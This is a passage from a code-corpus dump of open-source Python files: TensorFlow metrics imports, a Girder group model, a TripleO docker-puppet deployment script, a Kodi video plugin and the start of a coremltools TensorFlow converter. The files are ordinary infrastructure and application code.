from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
# pylint: enable=unused-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| 1.546875 | 2 |
girder/models/group.py | scottwittenburg/girder | 0 | 4926 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
from .model_base import AccessControlledModel,\
ValidationException,\
AccessException
from girder.constants import AccessType
class Group(AccessControlledModel):
"""
Groups are simply groups of users. The primary use of grouping users is
to simplify access control for resources in the system, but they can
be used for other purposes that require groupings of users as well.
Group membership is stored in the database on the user document only;
there is no "users" field in this model. This is to optimize for the most
common use case for querying membership, which involves checking access
control policies, which is always done relative to a specific user. The
task of querying all members within a group is much less common and
typically only performed ona single group at a time, so doing a find on the
indexed group list in the user collection is sufficiently fast.
Users with READ access on the group can see the group and its members.
Users with WRITE access on the group can add and remove members and
change the name or description.
Users with ADMIN access can delete the entire group.
"""
def initialize(self):
self.name = 'group'
self.ensureIndices(['lowerName'])
self.ensureTextIndex({
'name': 10,
'description': 1
})
def validate(self, doc):
doc['name'] = doc['name'].strip()
doc['lowerName'] = doc['name'].lower()
doc['description'] = doc['description'].strip()
if not doc['name']:
raise ValidationException('Group name must not be empty.', 'name')
q = {
'lowerName': doc['lowerName'],
}
if '_id' in doc:
q['_id'] = {'$ne': doc['_id']}
duplicates = self.find(q, limit=1, fields=['_id'])
if duplicates.count() != 0:
raise ValidationException('A group with that name already'
'exists.', 'name')
return doc
def list(self, user=None, limit=50, offset=0, sort=None):
"""
Search for groups or simply list all visible groups.
:param text: Pass this to perform a text search of all groups.
:param user: The user to search as.
:param limit: Result set size limit.
:param offset: Offset into the results.
:param sort: The sort direction.
"""
# Perform the find; we'll do access-based filtering of the result
# set afterward.
cursor = self.find({}, limit=0, sort=sort)
for r in self.filterResultsByPermission(cursor=cursor, user=user,
level=AccessType.READ,
limit=limit, offset=offset):
yield r
def remove(self, group):
"""
Delete a group, and all references to it in the database.
:param group: The group document to delete.
:type group: dict
"""
# Remove references to this group from user group membership lists
self.model('user').update({
'groups': group['_id']
}, {
'$pull': {'groups': group['_id']}
})
acQuery = {
'access.groups.id': group['_id']
}
acUpdate = {
'$pull': {
'access.groups': {'id': group['_id']}
}
}
# Remove references to this group from access-controlled collections.
self.update(acQuery, acUpdate)
self.model('collection').update(acQuery, acUpdate)
self.model('folder').update(acQuery, acUpdate)
self.model('user').update(acQuery, acUpdate)
# Finally, delete the document itself
AccessControlledModel.remove(self, group)
def getMembers(self, group, offset=0, limit=50, sort=None):
"""
Return the list of all users who belong to this group.
:param group: The group to list members on.
:param offset: Offset into the result set of users.
:param limit: Result set size limit.
:param sort: Sort parameter for the find query.
:returns: List of user documents.
"""
q = {
'groups': group['_id']
}
cursor = self.model('user').find(
q, offset=offset, limit=limit, sort=sort)
users = []
for user in cursor:
users.append(user)
return users
def addUser(self, group, user, level=AccessType.READ):
"""
Add the user to the group. Records membership in the group in the
user document, and also grants the specified access level on the
group itself to the user. Any group member has at least read access on
the group.
"""
if not 'groups' in user:
user['groups'] = []
if not group['_id'] in user['groups']:
user['groups'].append(group['_id'])
self.model('user').save(user, validate=False)
self.setUserAccess(group, user, level, save=True)
return group
def joinGroup(self, group, user):
"""
Call this when the user accepts an invitation.
"""
if not 'groupInvites' in user:
user['groupInvites'] = []
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
self.addUser(group, user, level=invite['level'])
user['groupInvites'].remove(invite)
self.model('user').save(user, validate=False)
break
else:
raise AccessException('User was not invited to this group.')
return group
def inviteUser(self, group, user, level=AccessType.READ):
"""
Invite a user to join the group. Inviting them automatically
grants the user read access to the group so that they can see it.
Once they accept the invitation, they will be given the specified level
of access.
"""
# User has to be able to see the group to join it
self.setUserAccess(group, user, AccessType.READ, save=True)
if group['_id'] in user.get('groups', []):
raise ValidationException('User is already in this group.')
if not 'groupInvites' in user:
user['groupInvites'] = []
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
invite['level'] = level
break
else:
user['groupInvites'].append({
'groupId': group['_id'],
'level': level
})
return self.model('user').save(user, validate=False)
def removeUser(self, group, user):
"""
Remove the user from the group.
"""
# Remove group membership for this user.
if 'groups' in user and group['_id'] in user['groups']:
user['groups'].remove(group['_id'])
self.model('user').save(user, validate=False)
# Remove all group access for this user on this group.
self.setUserAccess(group, user, level=None, save=True)
return group
def createGroup(self, name, creator, description='', public=True):
"""
Create a new group. The creator will be given admin access to it.
:param name: The name of the folder.
:type name: str
:param description: Description for the folder.
:type description: str
:param public: Whether the group is publicly visible.
:type public: bool
:param creator: User document representing the creator of the group.
:type creator: dict
:returns: The group document that was created.
"""
assert type(public) is bool
now = datetime.datetime.now()
group = {
'name': name,
'description': description,
'created': now,
'updated': now
}
self.setPublic(group, public=public)
# Now validate and save the group
self.save(group)
# We make the creator a member of this group and also grant them
# admin access over the group.
self.addUser(group, creator, level=AccessType.ADMIN)
return group
| 1.859375 | 2 |
docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 0 | 4927 | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Shell script tool to run puppet inside of the given docker container image.
# Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON
# array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings
# that can be used to generate config files or run ad-hoc puppet modules
# inside of a container.
import glob
import json
import logging
import os
import sys
import subprocess
import sys
import tempfile
import multiprocessing
log = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
if os.environ.get('DEBUG', False):
log.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
# this is to match what we do in deployed-server
def short_hostname():
subproc = subprocess.Popen(['hostname', '-s'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
return cmd_stdout.rstrip()
def pull_image(name):
log.info('Pulling image: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'pull', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
def match_config_volume(prefix, config):
# Match the mounted config volume - we can't just use the
# key as e.g "novacomute" consumes config-data/nova
volumes = config.get('volumes', [])
config_volume=None
for v in volumes:
if v.startswith(prefix):
config_volume = os.path.relpath(
v.split(":")[0], prefix).split("/")[0]
break
return config_volume
def get_config_hash(prefix, config_volume):
hashfile = os.path.join(prefix, "%s.md5sum" % config_volume)
hash_data = None
if os.path.isfile(hashfile):
with open(hashfile) as f:
hash_data = f.read().rstrip()
return hash_data
def rm_container(name):
if os.environ.get('SHOW_DIFF', None):
log.info('Diffing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'diff', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
log.info('Removing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'rm', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr and \
cmd_stderr != 'Error response from daemon: ' \
'No such container: {}\n'.format(name):
log.debug(cmd_stderr)
process_count = int(os.environ.get('PROCESS_COUNT',
multiprocessing.cpu_count()))
log.info('Running docker-puppet')
config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json')
log.debug('CONFIG: %s' % config_file)
with open(config_file) as f:
json_data = json.load(f)
# To save time we support configuring 'shared' services at the same
# time. For example configuring all of the heat services
# in a single container pass makes sense and will save some time.
# To support this we merge shared settings together here.
#
# We key off of config_volume as this should be the same for a
# given group of services. We are also now specifying the container
# in which the services should be configured. This should match
# in all instances where the volume name is also the same.
configs = {}
for service in (json_data or []):
if service is None:
continue
if isinstance(service, dict):
service = [
service.get('config_volume'),
service.get('puppet_tags'),
service.get('step_config'),
service.get('config_image'),
service.get('volumes', []),
]
config_volume = service[0] or ''
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if not manifest or not config_image:
continue
log.info('config_volume %s' % config_volume)
log.info('puppet_tags %s' % puppet_tags)
log.info('manifest %s' % manifest)
log.info('config_image %s' % config_image)
log.info('volumes %s' % volumes)
# We key off of config volume for all configs.
if config_volume in configs:
# Append puppet tags and manifest.
log.info("Existing service, appending puppet tags and manifest")
if puppet_tags:
configs[config_volume][1] = '%s,%s' % (configs[config_volume][1],
puppet_tags)
if manifest:
configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2],
manifest)
if configs[config_volume][3] != config_image:
log.warn("Config containers do not match even though"
" shared volumes are the same!")
else:
log.info("Adding new service")
configs[config_volume] = service
log.info('Service compilation completed.')
def mp_puppet_config((config_volume, puppet_tags, manifest, config_image, volumes)):
log.debug('config_volume %s' % config_volume)
log.debug('puppet_tags %s' % puppet_tags)
log.debug('manifest %s' % manifest)
log.debug('config_image %s' % config_image)
log.debug('volumes %s' % volumes)
sh_script = '/var/lib/docker-puppet/docker-puppet.sh'
with open(sh_script, 'w') as script_file:
os.chmod(script_file.name, 0755)
script_file.write("""#!/bin/bash
set -ex
mkdir -p /etc/puppet
cp -a /tmp/puppet-etc/* /etc/puppet
rm -Rf /etc/puppet/ssl # not in use and causes permission errors
echo "{\\"step\\": $STEP}" > /etc/puppet/hieradata/docker.json
TAGS=""
if [ -n "$PUPPET_TAGS" ]; then
TAGS="--tags \"$PUPPET_TAGS\""
fi
# workaround LP1696283
mkdir -p /etc/ssh
touch /etc/ssh/ssh_known_hosts
FACTER_hostname=$HOSTNAME FACTER_uuid=docker /usr/bin/puppet apply --verbose $TAGS /etc/config.pp
# Disables archiving
if [ -z "$NO_ARCHIVE" ]; then
archivedirs=("/etc" "/root" "/var/lib/ironic/tftpboot" "/var/lib/ironic/httpboot" "/var/www")
rsync_srcs=""
for d in "${archivedirs[@]}"; do
if [ -d "$d" ]; then
rsync_srcs+=" $d"
fi
done
rsync -a -R --delay-updates --delete-after $rsync_srcs /var/lib/config-data/${NAME}
# Also make a copy of files modified during puppet run
# This is useful for debugging
mkdir -p /var/lib/config-data/puppet-generated/${NAME}
rsync -a -R -0 --delay-updates --delete-after \
--files-from=<(find $rsync_srcs -newer /etc/ssh/ssh_known_hosts -print0) \
/ /var/lib/config-data/puppet-generated/${NAME}
# Write a checksum of the config-data dir, this is used as a
# salt to trigger container restart when the config changes
tar -c -f - /var/lib/config-data/${NAME} --mtime='1970-01-01' | md5sum | awk '{print $1}' > /var/lib/config-data/${NAME}.md5sum
fi
""")
with tempfile.NamedTemporaryFile() as tmp_man:
with open(tmp_man.name, 'w') as man_file:
man_file.write('include ::tripleo::packages\n')
man_file.write(manifest)
rm_container('docker-puppet-%s' % config_volume)
pull_image(config_image)
dcmd = ['/usr/bin/docker', 'run',
'--user', 'root',
'--name', 'docker-puppet-%s' % config_volume,
'--env', 'PUPPET_TAGS=%s' % puppet_tags,
'--env', 'NAME=%s' % config_volume,
'--env', 'HOSTNAME=%s' % short_hostname(),
'--env', 'NO_ARCHIVE=%s' % os.environ.get('NO_ARCHIVE', ''),
'--env', 'STEP=%s' % os.environ.get('STEP', '6'),
'--volume', '%s:/etc/config.pp:ro' % tmp_man.name,
'--volume', '/etc/puppet/:/tmp/puppet-etc/:ro',
'--volume', '/usr/share/openstack-puppet/modules/:/usr/share/openstack-puppet/modules/:ro',
'--volume', '/var/lib/config-data/:/var/lib/config-data/:rw',
'--volume', 'tripleo_logs:/var/log/tripleo/',
# OpenSSL trusted CA injection
'--volume', '/etc/pki/ca-trust/extracted:/etc/pki/ca-trust/extracted:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.crt:/etc/pki/tls/certs/ca-bundle.crt:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.trust.crt:/etc/pki/tls/certs/ca-bundle.trust.crt:ro',
'--volume', '/etc/pki/tls/cert.pem:/etc/pki/tls/cert.pem:ro',
# script injection
'--volume', '%s:%s:rw' % (sh_script, sh_script) ]
for volume in volumes:
if volume:
dcmd.extend(['--volume', volume])
dcmd.extend(['--entrypoint', sh_script])
env = {}
# NOTE(flaper87): Always copy the DOCKER_* environment variables as
# they contain the access data for the docker daemon.
for k in filter(lambda k: k.startswith('DOCKER'), os.environ.keys()):
env[k] = os.environ.get(k)
if os.environ.get('NET_HOST', 'false') == 'true':
log.debug('NET_HOST enabled')
dcmd.extend(['--net', 'host', '--volume',
'/etc/hosts:/etc/hosts:ro'])
dcmd.append(config_image)
log.debug('Running docker command: %s' % ' '.join(dcmd))
subproc = subprocess.Popen(dcmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env=env)
cmd_stdout, cmd_stderr = subproc.communicate()
if subproc.returncode != 0:
log.error('Failed running docker-puppet.py for %s' % config_volume)
if cmd_stdout:
log.error(cmd_stdout)
if cmd_stderr:
log.error(cmd_stderr)
else:
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
# only delete successful runs, for debugging
rm_container('docker-puppet-%s' % config_volume)
return subproc.returncode
# Holds all the information for each process to consume.
# Instead of starting them all linearly we run them using a process
# pool. This creates a list of arguments for the above function
# to consume.
process_map = []
for config_volume in configs:
service = configs[config_volume]
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if puppet_tags:
puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags
else:
puppet_tags = "file,file_line,concat,augeas"
process_map.append([config_volume, puppet_tags, manifest, config_image, volumes])
for p in process_map:
log.debug('- %s' % p)
# Fire off processes to perform each configuration. Defaults
# to the number of CPUs on the system.
p = multiprocessing.Pool(process_count)
returncodes = list(p.map(mp_puppet_config, process_map))
config_volumes = [pm[0] for pm in process_map]
success = True
for returncode, config_volume in zip(returncodes, config_volumes):
if returncode != 0:
log.error('ERROR configuring %s' % config_volume)
success = False
# Update the startup configs with the config hash we generated above
config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data')
log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix)
startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs)
infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
for infile in infiles:
with open(infile) as f:
infile_data = json.load(f)
for k, v in infile_data.iteritems():
config_volume = match_config_volume(config_volume_prefix, v)
if config_volume:
config_hash = get_config_hash(config_volume_prefix, config_volume)
if config_hash:
env = v.get('environment', [])
env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash)
log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash))
infile_data[k]['environment'] = env
outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile))
with open(outfile, 'w') as out_f:
json.dump(infile_data, out_f)
if not success:
sys.exit(1)
| 2.015625 | 2 |
main.py | acitv/plugin.video.aci | 0 | 4928 | # -*- coding: utf-8 -*-
import sys
import urllib
import urlparse
# import xbmc
import xbmcgui
import xbmcplugin
import aci
# Get the plugin url in plugin:// notation.
_url = sys.argv[0]
# Get the plugin handle as an integer number.
_handle = int(sys.argv[1])
# Get an instance of ACI.
ATV = aci.ACI()
ATV.load_aci()
# Encode user agent headers for video.
user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 '
'Firefox/47.0 FirePHP/0.7.4',
'X-Requested-With': 'ShockwaveFlash/2172.16.17.32'
})
def get_url(**kwargs):
"""
Create a URL for calling the plugin recursively from the given set of keyword arguments.
:param kwargs: "argument=value" pairs
:type kwargs: dict
:return: plugin call URL
:rtype: str
"""
return '{0}?{1}'.format(_url, urllib.urlencode(kwargs))
def get_categories():
"""
Get the list of video categories.
Here you can insert some parsing code that retrieves
the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.)
from some site or server.
.. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:return: The list of video categories
:rtype: types.GeneratorType
"""
return ATV.aci.iterkeys()
def get_videos(category):
"""
Get the list of video files/streams.
Here you can insert some parsing code that retrieves
the list of video streams in the given category from some site or server.
.. note:: Consider using `generators functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:param category: Category name
:type category: str
:return: the list of videos in the category
:rtype: list
"""
return ATV.aci[category]
def list_categories():
"""
Create the list of video categories in the Kodi interface.
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, 'ACI')
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get video categories
categories = get_categories()
# Iterate through categories
for category in categories:
# xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE)
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=category.title())
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': "icon.png",
'icon': "icon.png",
'fanart': "icon.png"})
# Set additional info for the list item.
# Here we use a category name for both properties for for simplicity's sake.
# setInfo allows to set various information for an item.
# For available properties see the following link:
# https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14
# 'mediatype' is needed for a skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': category.title(),
'genre': category.title(),
'mediatype': 'video'})
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=listing&category=[category name]
url = get_url(action="listing", category=category)
# is_folder = True means that this item opens a sub-list of lower level items.
is_folder = True
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
"""
Create the list of playable videos in the Kodi interface.
:param category: Category name
:type category: str
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, category)
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get the list of videos in the category.
videos = get_videos(category)
# Iterate through each video.
for video_id in videos:
# Get the video item to process.
video_item = videos[video_id]
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=video_item["title"])
# Set additional info for the list item.
# 'mediatype' is needed for skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': video_item["title"],
'genre': category.title(),
'mediatype': 'video'})
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': video_item["thumbnail"],
'icon': video_item["thumbnail"],
'fanart': video_item["thumbnail"]
})
# Set 'IsPlayable' property to 'true'.
# This is mandatory for playable items!
list_item.setProperty('IsPlayable', 'true')
referer_header = urllib.urlencode({"Referer": video_item["location"]})
video_item['url'] += '|%s&%s' % (user_agent_headers, referer_header)
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=play&
# video=[video url]
url = get_url(action='play', video=video_item['url'])
# video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \
# '&streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \
# '&|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \
# 'FirePHP/0.7.4&X-Requested-With=ShockwaveFlash/22.0.0.192&Referer=' + \
# urllib.quote_plus(video['reference'])
# url = get_url(action='play', video=video_url)
# Add the list item to a virtual Kodi folder.
# is_folder = False means that this item won't open any sub-list.
is_folder = False
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def play_video(path):
"""
Play a video by the provided path.
:param path: Fully-qualified video URL
:type path: str
"""
# Create a playable item with a path to play.
play_item = xbmcgui.ListItem(path=path)
# Play with inputstream addon.
play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')
play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring: URL encoded plugin paramstring
:type paramstring: str
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(urlparse.parse_qsl(paramstring))
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Load the videos for aci.
if params['category'] == "shows":
ATV.update_aci_shows()
print("Updated from main shows.")
elif params['category'] == "cable":
ATV.update_aci_cable()
print("Updated from main cable.")
elif params['category'] == "movies":
ATV.update_aci_movies()
print("Updated from main movies.")
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the provided paramstring does not contain a supported action
# we raise an exception. This helps to catch coding errors,
# e.g. typos in action names.
raise ValueError('Invalid paramstring: {0}!'.format(paramstring))
else:
# Load ATV.
ATV.load_aci()
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
| 3.015625 | 3 |
coremltools/converters/mil/frontend/tensorflow/converter.py | VadimLevin/coremltools | 3 | 4929 | <filename>coremltools/converters/mil/frontend/tensorflow/converter.py
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import logging
from coremltools.converters.mil.input_types import (
InputType,
TensorType,
ImageType,
RangeDim,
_get_shaping_class,
)
from coremltools.converters.mil.input_types import Shape as InputShape
from coremltools.converters.mil.mil.var import Var
from coremltools.converters.mil.mil import get_new_symbol
from coremltools.converters.mil.mil.types.symbolic import is_symbolic
from coremltools.converters.mil.mil.types import is_tensor
from coremltools.converters.mil.mil import types
from .basic_graph_ops import topsort, simple_topsort
from .convert_utils import convert_graph
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil import Program
from coremltools.converters.mil.mil import Function
from .ssa_passes.tf_passes import tensorflow_passes
from coremltools.converters._profile_utils import _profile
# TranscriptionContext maintains a map of tf_node.name --> ssa_var available
# to the current TF --> tfssa transcription.
class TranscriptionContext:
def __init__(self, name=None):
self.name = name if name is not None else ""
self.context = {}
self.graphs = {}
# TF loops are represented as functions, so nested loops becomes
# stacked functions. Stacked functions are translated to nested
# blocks in Program, like
#
# while_loop(loop_vars=(%a, %b))
# cond_block1(%a.x, %b.x) {
# ...some ops
# } -> (%bool_var1)
# body_block1(%a.x, %b.x) {
# %ret_axx = while_loop(loop_vars=(%a.x,))
# cond_block2(%a.x.x) {
# ...some ops
# } -> (%bool_var2)
# body_block2(%a.x.x) {
# ...some ops
# } -> (%new_a.x.x)
# } -> (%ret_axx)
# ....some ops using %ret_a
# } -> (%ret_ax, %ret_bx)
#
# During the translation of cond_block2, we'd have func_input_stack
#
# (%a.x.x,)
# (%a.x, %b.x)
#
# where [%a.x.x] would be unstacked once cond_block2 is done.
self.func_input_stack = [] # list of tuple[Var]
def add(self, tf_name, ssa_vars, is_new_var=True):
"""
ssa_vars: list[Var] / tuple[Var] (multiple outputs) or
Var (single_output)
is_new_var: True if ssa_vars are newly created for tf_name.
"""
if tf_name in self.context:
# Overriding allow us to translate while_loop body twice (which is
# needed to figure out shapes changes during iterates)
msg = "TF var %s is added again. Overriding previous value"
logging.info(msg % tf_name)
if is_new_var and isinstance(ssa_vars, Var) and tf_name != ssa_vars.name:
msg = (
"MIL op's name ({}) does not match TensorFlow's node name ({})."
" Warning: Node added to context must have the same name as the name passed to context."
)
raise ValueError(msg.format(tf_name, ssa_vars.name))
self.context[tf_name] = ssa_vars
def add_graph(self, graph_name, graph):
self.graphs[graph_name] = graph
def get_graph(self, graph_name):
if graph_name not in self.graphs:
msg = "Graph '{}' not found in: {}"
raise KeyError(msg.format(graph_name, list(self.graphs.keys())))
return self.graphs[graph_name]
def stack_func_inputs(self, inputs):
self.func_input_stack.append(inputs)
def unstack_func_inputs(self):
if len(self.func_input_stack) == 0:
raise ValueError("No func input available")
self.func_input_stack.pop()
def get_func_inputs(self):
if len(self.func_input_stack) == 0:
raise ValueError("No func input available")
return self.func_input_stack[-1]
def __getitem__(self, tf_name):
if tf_name not in self.context:
msg = "TF var {} not found in context {}"
raise KeyError(msg.format(tf_name, self.name))
return self.context[tf_name]
def __contains__(self, tf_name):
return tf_name in self.context
class TFConverter:
def __init__(self, tfssa, inputs=None, outputs=None, **kwargs):
"""
tfssa: TensorFlow IR.
inputs: list of TensorType or ImageType, optional, defaults to None.
outputs: list of str or str, optional, defaults to None.
A list of names of the output nodes or a str for single output name.
If None, the converter will try to extract the output information from
TensorFlow model.
"""
self.tfssa = tfssa
self.global_type = {}
self.inputs = None
main_func = tfssa.functions["main"]
graph = main_func.graph
# Filter the inputs to only Placeholder names
tf_placeholder_names = [n for n in graph if graph[n].op == "Placeholder"]
placeholder_names = []
if inputs is not None:
# Check inputs format
if not isinstance(inputs, (list, tuple)):
raise ValueError(
"Type of inputs should be list or tuple, got {} instead.".format(
type(inputs)
)
)
if not all([isinstance(i, InputType) for i in inputs]):
raise ValueError(
"Type of inputs should be list or tuple of TensorType or ImageType, got {} instead.".format(
[type(i) for i in inputs]
)
)
# Special case: if there's only 1 input and 1 placeholder, we match them.
if len(tf_placeholder_names) == 1 and len(inputs) == 1:
if inputs[0].name is None:
inputs[0].name = tf_placeholder_names[0]
# filter out those inputs which is not in tf_placeholder_names
inputs = [x for x in inputs if x.name in tf_placeholder_names]
# We fill in shapes for user-specified input that doesn't have shape
for inp in inputs:
# Check inputs existence
if inp.name is None:
raise ValueError(
"Unable to infer input's name or input name was not provided"
)
if inp.name not in tf_placeholder_names:
raise ValueError(
"Input ({}) provided is not found in given tensorflow graph. Placeholders in graph are: {}".format(
inp.name, tf_placeholder_names
)
)
if inp.shape is None:
shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp.name)
# _get_shaping_class does not accept -1 or None dimension.
shape = [get_new_symbol() if s is None or s == -1 else s \
for s in shape]
inp.shape = _get_shaping_class(shape)
# Extract placeholders that users didn't specify.
user_input_names = [inp.name for inp in inputs]
for name in tf_placeholder_names:
if name not in user_input_names:
placeholder_names.append(name)
else:
inputs = []
placeholder_names = tf_placeholder_names
# name -> (shape, mil_type) mapping. shape has type list[int]
added_inputs = {}
for inp in main_func.inputs:
if inp not in placeholder_names:
continue
node = graph[inp]
dtype = node.attr['dtype']
